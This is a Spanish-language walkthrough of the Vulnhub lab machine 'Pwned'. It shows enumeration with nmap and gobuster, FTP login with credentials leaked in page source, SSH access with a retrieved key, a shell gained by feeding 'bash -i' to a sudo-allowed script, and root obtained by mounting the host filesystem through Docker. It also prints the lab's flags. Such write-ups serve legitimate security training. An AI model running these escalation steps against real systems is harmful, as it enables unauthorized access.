[VLN] Pwned

Hoy vamos a hackear la maquina de Vulnhub llamada Pwned. Podeis descargarla desde el siguiente enlace: Pwned

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.93                                                  
      13s
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 17:04 CEST
Nmap scan report for pwned.home (192.168.1.93)
Host is up (0.0011s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
Exploramos un poco mas el puerto 80 a ver que vemos.

~ > gobuster dir -u 192.168.1.93 -w 
/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.93
[+] Threads:        10
[+] Wordlist:       
/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/10 17:27:57 Starting gobuster
===============================================================
/nothing (Status: 301)
/hidden_text (Status: 301)
/server-status (Status: 403)
Encontramos el directorio hidden_text. Al visitar http://192.168.1.93/hidden_text vemos que hay un fichero, secret.dic que contiene:

/hacked
/vanakam_nanba
/hackerman.gif 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg 
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home
Nos descargamos el fichero secret.dic

wget http://192.168.1.93/hidden_text/secret.dic
Una vez descargado, ejecutamos gobuster usando como diccionario el fichero secret.dic.

~/ctf/vulnhub/cybersploit > gobuster dir -u http://192.168.1.93 -w secret.dic 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.93
[+] Threads:        10
[+] Wordlist:       secret.dic
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/10 17:31:52 Starting gobuster
===============================================================
//pwned.vuln (Status: 301)
===============================================================
2020/07/10 17:31:52 Finished
===============================================================
Vemos que aparece pwned.vuln Visitamos http://192.168.1.93/pwned.vuln/ y en el codigo fuente de la web podemos ver:

//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
Nos logueamos en el ftp con esos credenciales. (ftpuser/B0ss_B!TcH)

~/ctf/vulnhub/cybersploit > ftp 192.168.1.93
Connected to 192.168.1.93.
220 (vsFTPd 3.0.3)
Name (192.168.1.93:sml): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10 12:47 share
226 Directory send OK.
ftp>
Exploramos la carpeta share del ftp y nos descargamos su contenido.

ftp> cd share
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09 15:05 id_rsa
-rw-r--r--    1 0        0              75 Jul 09 17:41 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.00 secs (3.8592 MB/s)
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.00 secs (61.8078 kB/s)
Vemos que esta el fichero id_rsa, el cual puede que sea una llave privada. Le damos los permisos apropiados...

~ > chmod 600 id_rsa 
Por otro lado tenemos el fichero note.txt

~ > cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
Vemos que aparece el usuario "ariana" en la nota. Usamos el usuario ariana y la key id_rsa para ver si obtenemos una shell por ssh.

Low Shell



~ > ssh -i id_rsa ariana@192.168.1.93
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$

user1.txt



ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana 
Here is your user flag
fb8d98be1265dd88bac522e1b2182140
Try harder.need become root
Miramos si podemos utilizar sudo con el usuario ariana, y que podemos hacer...

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh
Bien, podemos ejecutar un script como el usuario selena. Miramos el script...

ariana@pwned:~$ cat /home/messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
		echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
		echo ""
echo "$users"
		echo ""
read -p "Enter username to send message : " name 
		echo ""
read -p "Enter message for $name :" msg
		echo ""
echo "Sending message to $name "

$msg 2> /dev/null
		echo ""
echo "Message sent to $name :) "
		echo ""
Lo ejecutamos, y ponemos "bash -i" para obtener una shell como "selena" :)

ariana@pwned:~$ sudo -u selena /home/messenger.sh

Welcome to linux.messenger 
ariana:
selena:
ftpuser:

Enter username to send message : bash -i
Enter message for bash -i :bash -i
Sending message to bash -i 
python3 -c 'import pty; pty.spawn("/bin/bash")' #NO SE VE
selena@pwned:/home/ariana$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

user2.txt



selena@pwned:~$ cat user2.txt 
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.
Try harder to catch me
Vemos que el usuario selena pertenece al grupo docker. Miramos que imagenes hay...

selena@pwned:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             
SIZE
privesc             latest              09ae39f0f8fc        4 days ago          
88.3MB
                            e13ad046d435        4 days ago          
88.3MB
alpine              latest              a24bb4013296        5 weeks ago         
5.57MB
debian              wheezy              10fcec6d95c4        16 months ago       
88.3MB
Montamos la raiz del sistema / en la imagen docker "privesc" y ejecutamos /bin/sh.

selena@pwned:~$ docker run -v /:/mnt/fuckfs -ti 09ae39f0f8fc /bin/sh
Ahora solo quedaria mirar la carpeta /root.

root.txt



# cd /mnt/fuckfs/root
# ls
root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this (◎ . ◎)
I am Ajay (Annlynn) i hacked your server left and this for you.
I trapped Ariana and Selena to takeover your server :)

You Pwned the Pwned congratulations :)
share the screen shot or flags to given contact details for confirmation 
Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
Instgarm   ajs_walker 
Twitter    Ajs_walker

End


Y con esto ya seriamos root de la maquina :)